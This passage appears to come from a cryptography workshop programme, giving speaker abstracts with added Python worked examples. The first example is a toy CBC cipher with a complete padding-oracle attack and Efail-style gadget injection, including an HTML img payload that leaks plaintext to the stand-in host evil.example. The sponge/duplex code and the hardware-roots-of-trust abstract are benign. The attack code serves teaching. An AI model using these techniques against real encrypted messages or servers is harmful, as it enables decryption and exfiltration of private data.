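BLOCK = 16  # 128-bit blocks, as with AES

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, i, half):  # keyed round function of the constructed toy Feistel cipher
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]

def encrypt_block(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        left, right = right, _xor(left, _f(key, i, right))
    return left + right

def decrypt_block(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(4)):
        left, right = _xor(right, _f(key, i, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    prev, out = iv, b""
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):  # returns the padded plaintext without checking it
    prev, out = iv, b""
    for i in range(0, len(ct), BLOCK):
        out += _xor(decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def padding_oracle(key, iv, ct):
    """The server: its observable behaviour differs with padding validity."""
    try:
        pkcs7_unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False

def padding_oracle_attack(oracle, iv, ct):
    """Recover the plaintext of iv||ct using only oracle(forged_prev, block)."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    out = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D(target), recovered right to left
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad  # known bytes forced to the pad value
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:
                    # rule out a false positive (e.g. a valid 0x02 0x02 pad):
                    # disturbing the byte to the left keeps a real 0x01 pad valid
                    forged[pos - 1] ^= 0xFF
                    still_ok = oracle(bytes(forged), target)
                    forged[pos - 1] ^= 0xFF
                    if not still_ok:
                        continue
                inter[pos] = guess ^ pad
                break
        out += _xor(bytes(inter), prev)
    return pkcs7_unpad(out)

def cbc_gadget(iv, known_plain, chosen):
    """Efail-style CBC gadget: with P_0 = D(C_0) XOR IV known, the pair
    (X, C_0) with X = IV XOR P_0 XOR chosen decrypts to (garbage, chosen)
    wherever it is placed in the ciphertext."""
    return _xor(_xor(iv, known_plain), chosen)

def inject_with_gadgets(iv, c0, known_plain, chosen_blocks):
    return b"".join(cbc_gadget(iv, known_plain, c) + c0 for c in chosen_blocks)

def demo():
    key, iv = os.urandom(16), os.urandom(16)
    secret = b"Content-type: text/html\r\n\r\nmeeting at 9, room 42"  # constructed
    ct = cbc_encrypt(key, iv, pkcs7_pad(secret))
    recovered = padding_oracle_attack(lambda v, b: padding_oracle(key, v, b), iv, ct)
    # Efail-style injection knowing only the first plaintext block (a MIME header).
    payload = b'<img src="http://evil.example/?leak="'
    chosen = [payload[i:i + BLOCK].ljust(BLOCK, b" ") for i in range(0, len(payload), BLOCK)]
    injected = cbc_decrypt(key, iv, inject_with_gadgets(iv, ct[:BLOCK], secret[:BLOCK], chosen))
    return recovered, [injected[i:i + BLOCK] for i in range(BLOCK, len(injected), 2 * BLOCK)]
```

    demo() returns the plaintext recovered from the oracle alone and the chosen blocks that appear, interleaved with garbage blocks, when the forged message is decrypted; in the Efail setting the garbage is swallowed by the HTML parser and the chosen text forms the exfiltration channel.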

  • Gilles Van Assche, STMicroelectronics, Belgium
  • Title: Overview of the sponge, duplex and Farfalle constructions
    Abstract: In this presentation, we introduce the sponge construction that allows one to build an extendable-output function (XOF) from a cryptographic permutation. Starting from this point, we then explore different variants along two axes. On the first axis, we highlight the differences in security when used for hashing (unkeyed) or for encryption and authentication (keyed). And on the second axis, we show how to add incremental input properties, using the duplex constructions and variants. We also set the stage with the indifferentiability and the indistinguishability frameworks for unkeyed and keyed applications, respectively. Finally, we explore the permutation-based Farfalle construction as a way to build an efficient deck function from permutation components.
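
    The sponge and duplex constructions from the abstract, as an added worked example that is not the speaker's code. It assumes a constructed 32-byte permutation (an unkeyed 6-round SHA-256 Feistel) with rate r = 16 bytes and capacity c = 16 bytes; a real design uses a dedicated permutation such as Keccak-f and a capacity giving c/2-bit generic security. The XOF absorbs the padded message one rate block at a time and squeezes as many rate blocks as requested, and the duplex object shows the incremental-input property: each call absorbs a short input and returns output at once, and its output equals the sponge applied to the padded concatenation of everything absorbed so far.

```python
import hashlib

WIDTH = 32  # permutation width b in bytes
RATE = 16   # r bytes absorbed or squeezed per permutation call; capacity c = WIDTH - RATE

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def permute(state):
    """Constructed toy permutation: an unkeyed Feistel network, invertible by design."""
    left, right = state[:WIDTH // 2], state[WIDTH // 2:]
    for i in range(6):
        left, right = right, _xor(left, hashlib.sha256(bytes([i]) + right).digest()[:WIDTH // 2])
    return left + right

def pad10star1(msg):
    """Multi-rate padding: append 0x01, zeros up to the rate, then set the final bit."""
    padded = bytearray(msg) + b"\x01"
    while len(padded) % RATE:
        padded += b"\x00"
    padded[-1] |= 0x80
    return bytes(padded)

def _absorb(state, block):
    return permute(_xor(state[:RATE], block) + state[RATE:])  # capacity part is never touched by input

def sponge_xof(msg, out_len):
    """Absorb the padded message rate block by rate block, then squeeze out_len bytes."""
    state = bytes(WIDTH)
    padded = pad10star1(msg)
    for i in range(0, len(padded), RATE):
        state = _absorb(state, padded[i:i + RATE])
    out = b""
    while len(out) < out_len:  # extendable output: keep permuting and reading the rate part
        out += state[:RATE]
        state = permute(state)
    return out[:out_len]

class Duplex:
    """Duplex object: each call absorbs one short input block and immediately
    returns output; the state carries everything absorbed so far."""
    def __init__(self):
        self.state = bytes(WIDTH)

    def duplexing(self, sigma, out_len):
        if len(sigma) >= RATE or out_len > RATE:
            raise ValueError("duplex input must fit in one rate block minus padding")
        self.state = _absorb(self.state, pad10star1(sigma))  # exactly one rate block
        return self.state[:out_len]
```

    Prefixing the message with a secret key turns the same sponge into the keyed mode the abstract contrasts with unkeyed hashing; only the security argument changes (indistinguishability instead of indifferentiability), not the construction.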

  • Ingrid Verbauwhede, KU Leuven, Belgium
  • Title: The need for Hardware roots of trust
    Abstract: Software security and cryptographic security protocols rely on hardware roots of trust. Software designers assume that cryptographic keys, random initial values, nonces, freshness, hardware isolation, or secure storage are simply available to them. At the same time, electronics shrink: sensor nodes, IoT devices, and smart devices are becoming more and more available. Adding security and cryptography to these often very resource-constrained devices is a challenge. This presentation will focus on design methods for hardware roots of trust and more specifically on Physically Unclonable Functions (PUFs) and True Random Number Generators (TRNGs), two essential roots of trust.